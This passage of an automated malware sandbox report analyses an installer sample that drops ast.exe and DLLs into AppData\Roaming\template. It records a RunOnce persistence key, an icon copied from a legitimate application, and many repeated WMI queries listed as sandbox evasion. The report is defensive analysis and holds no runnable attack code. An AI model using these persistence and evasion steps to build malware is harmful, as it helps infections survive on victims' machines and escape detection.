                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3386730194.000000006CEF3000.00000002.00000001.01000000.0000000E.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000008.00000003.2446543838.0000000003089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3377655988.000000006C1AF000.00000002.00000001.01000000.00000010.sdmp, is-SNDPS.tmp.4.dr
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.3372819038.000000006BDA7000.00000002.00000001.01000000.00000013.sdmp, is-E6DJ2.tmp.4.dr
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7AAE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency, 10_2_6B7AAE50
                          Source: is-SNDPS.tmp.4.dr Static PE information: section name: .rodata
                          Source: is-S3CIC.tmp.4.dr Static PE information: section name: .textbss
                          Source: is-S3CIC.tmp.4.dr Static PE information: section name: .msvcjmc
                          Source: is-S3CIC.tmp.4.dr Static PE information: section name: .00cfg
                          Source: is-E6DJ2.tmp.4.dr Static PE information: section name: .00cfg
                          Source: is-GPS00.tmp.4.dr Static PE information: section name: .00cfg
                          Source: is-JCRD8.tmp.4.dr Static PE information: section name: .code
                          Source: libssl-1_1.dll.8.dr Static PE information: section name: .00cfg
                          Source: quartz.dll.8.dr Static PE information: section name: .code
                          Source: astrct.dll.8.dr Static PE information: section name: .rodata
                          Source: hatls.dll.8.dr Static PE information: section name: .textbss
                          Source: hatls.dll.8.dr Static PE information: section name: .msvcjmc
                          Source: hatls.dll.8.dr Static PE information: section name: .00cfg
                          Source: libcrypto-1_1.dll.8.dr Static PE information: section name: .00cfg
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Code function: 10_2_6B7D9F78 push ecx; ret 10_2_6B7D9F76
                          Source: is-MU1HO.tmp.4.dr Static PE information: section name: .text entropy: 6.95576372950548
                          Source: msvcr120.dll.8.dr Static PE information: section name: .text entropy: 6.95576372950548
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_shfoldr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libeay32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-S3CIC.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libcrypto-1_1.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\astclient.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-BG0DN.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\ast.exe
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-JCRD8.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\opus.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\quartz.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\opus.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcrypto-1_1.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\msvcr120.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\astrct.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\astclient.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\hatls.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-60GLH.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\msvcr120.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\AstCrp.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\aw_sas32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-AAPRN.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libcurl.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\aw_sas32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_shfoldr.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\ast.exe (copy)
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe File created: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libjpeg-turbo-win.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libeay32.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\astrct.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-SNDPS.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-GPS00.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libcryptoMD.dll
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe File created: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5765H.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-16KCC.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-3UH24.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-5FFPK.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libssl-1_1.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcurl.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libssl-1_1.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\is-KMJLJ.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\AstCrp.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-MU1HO.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\quartz.dll
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\libjpeg-turbo-win.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-TBGHD.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\libcryptoMD.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-VO31B.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-0HK0N.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\template\hatls.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp File created: C:\Users\user\AppData\Local\Temp\u7i3kw\is-E6DJ2.tmp
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce ast

                          Hooking and other Techniques for Hiding and Protection

                          Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (15).png
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Roaming\template\ast.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Source: C:\Users\user\AppData\Roaming\template\ast.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
